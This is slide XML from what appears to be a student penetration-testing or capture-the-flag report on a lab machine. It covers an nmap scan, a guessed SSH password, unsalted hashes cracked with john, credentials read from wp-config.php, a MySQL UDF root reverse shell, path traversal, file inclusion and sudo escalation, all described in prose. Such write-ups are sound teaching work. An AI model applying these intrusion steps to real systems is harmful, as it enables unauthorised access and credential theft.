        <p:nvGraphicFramePr>
          <p:cNvPr id="2362" name="Google Shape;2362;p140"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1190938" y="270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{5EBBB976-D877-48E8-8CB2-E99944E27883}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
              </a:tblGrid>
              <a:tr h="94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58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services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22/80 left exposed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gives ability to ssh into users account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66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password with insufficient computational effort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 easily guessed, or decrypted.  passwords for database not hashed. hashed passwords contained no salt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user account, database, easily decrypt passwords using john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 credentials were exposed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view the wp-config.php to view database credentials (username/password)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mysql under the context of root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Traversal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path traversal vulnerability allows an attacker to access files on your web server to which they should not have access to.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attacker to view information of the hidden folders.  The files in the hidden folders contain sensitive information.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4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escalation</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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sudo -l to gain information needed to perform escalation.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root a user and gain complete access to the system.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1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8" name="Google Shape;2368;p1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9" name="Google Shape;2369;p14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0" name="Google Shape;2370;p141"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952463" y="313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{5EBBB976-D877-48E8-8CB2-E99944E27883}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
              </a:tblGrid>
              <a:tr h="8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26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4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library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mysql function to spawn reverse shell under the context of root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shell will give the user root access to modify any files in the system.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95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 credentials were exposed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view the wp-config.php to view database credentials (username/password)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mysql under the context of root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26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a web application allows the user to submit input  files or upload or create files to the server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run unix command using the URL because of local file inclusion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5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injection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Exploits an input validation flaw in software to introduce and execute malicious code.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create reverse shell to gain access to the victims machine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Google Shape;237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6" name="Google Shape;2376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77" name="Google Shape;2377;p142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8" name="Google Shape;2378;p142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1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploitation: Exposed Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2384" name="Google Shape;2384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5" name="Google Shape;2385;p143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1907150"/>
            <a:ext cx="22942800" cy="10254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Nmap was used to discover victim machine1 IP addresses and exposed services. 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Running command nmap -sV 192.168.1.110 returned that port 80 and port 22 were exposed.  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6" name="Google Shape;238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599" y="5288800"/>
            <a:ext cx="17227775" cy="70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1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploitation: SSH and Weak Passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2392" name="Google Shape;2392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3" name="Google Shape;2393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  <a:p>
            <a:pPr indent="-4889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100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port 22 was left exposed.   By guessing Michaels password, was able to gain access.   </a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-4889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100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once access granted, navigated to /var/www/html to find both flag1.txt and flag2.txt</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2394" name="Google Shape;239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675" y="5189274"/>
            <a:ext cx="10427899" cy="44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2900" y="5189275"/>
            <a:ext cx="11893975" cy="17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2900" y="7958500"/>
            <a:ext cx="11893975" cy="17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